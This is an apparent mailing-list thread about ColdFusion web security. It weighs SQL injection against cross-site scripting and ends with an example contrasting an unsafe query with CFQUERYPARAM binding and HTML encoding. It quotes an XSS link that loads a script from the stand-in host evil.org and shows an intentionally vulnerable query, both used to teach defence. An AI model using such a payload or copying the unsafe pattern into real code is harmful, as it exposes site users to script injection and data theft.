On 8/24/06, Dave Watts <[EMAIL PROTECTED]> wrote:
> > More evil is stuff like:
> >
> > <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT
> > SRC='http://evil.org/badkama.js' ...
>
> I don't know what you mean by "more evil", but generally speaking SQL
> injection attacks are considered to be a more serious problem than
> cross-site scripting attacks. Fortunately, though, it's quite easy to
> prevent them entirely - it's not so easy to prevent cross-site scripting
> attacks.
I guess "more evil" by it's easier to catch "SQL injection" than "injection".

> > I've always hated cfqueryparaming everything, or generally
> > hand-coding any database CRUD.
>
> You don't need to "hand-code database CRUD" to use CFQUERYPARAM. There's
> really no excuse for not using it. Even the Dreamweaver 8 code-generation
> wizards generate CFQUERYPARAM tags.

Clarification: I use cfqueryparam in my DAO (it is a Data[base] Access Object, but most folks seem to think hard-coded getters and setters (or at least I do) when they think DAO, and mine is all done in one function, for all tables). I meant it's a pain to maintain SQL all over the place (or even many places in one place, if that makes sense), vs. a single facade of sorts. Thus you add cfqueryparam in one place, and you're done. Conversely, you add XSS "counter-scripts" in one place, vs. many.

> > A link for stuff cfqueryparam might not catch (with examples):
> >
> > http://www.technicalinfo.net/papers/CSS.html
>
> No, CFQUERYPARAM won't catch cross-site scripting exploits. It's not
> intended to do that. It does, however, guarantee prevention of SQL
> injection exploits.

Yeah, the main idea being that for a while I figured cfqueryparam was enough, now it's dawning that there is a whole world of injection out there besides the SQL kind. Just as dangerous, I reckon. Or maybe not. It is pretty cool to have the DB server call you back... plain stealing data pales in comparison. 8-]

:DeN
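The two separate controls the thread is talking about, shown side by side in a ColdFusion snippet added here as an illustration (it is not code from the thread or from the poster's DAO): CFQUERYPARAM binds the value on the SQL side, and HTML output encoding handles the browser side. The datasource, table and column names are made up.

```cfml
<!--- Constructed example: table "articles" with columns id and title,
      searched by the URL parameter "criteria". --->

<!--- Vulnerable form: the parameter is pasted into the SQL text, so a
      crafted value is parsed as SQL rather than treated as data. --->
<cfquery name="unsafe" datasource="myDSN">
    SELECT id, title FROM articles
    WHERE title LIKE '%#url.criteria#%'
</cfquery>

<!--- Fixed form: CFQUERYPARAM sends the value as a bound parameter with a
      declared type and length, so the driver never interprets it as SQL. --->
<cfquery name="safe" datasource="myDSN">
    SELECT id, title FROM articles
    WHERE title LIKE <cfqueryparam cfsqltype="cf_sql_varchar"
                                   value="%#url.criteria#%"
                                   maxlength="100">
</cfquery>

<!--- CFQUERYPARAM does nothing for the page that echoes the search term
      back. Writing #url.criteria# unencoded would render any markup the
      value contains; HTMLEditFormat turns < > & " into entities so a
      script tag stays visible text. This is the second, separate control. --->
<cfoutput>
    <p>Results for #HTMLEditFormat(url.criteria)#</p>
    <ul>
    <cfloop query="safe">
        <li>#HTMLEditFormat(safe.title)#</li>
    </cfloop>
    </ul>
</cfoutput>
```

Both pieces sit naturally in one place each: the parameter binding inside the DAO facade, the encoding in whatever renders the output.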

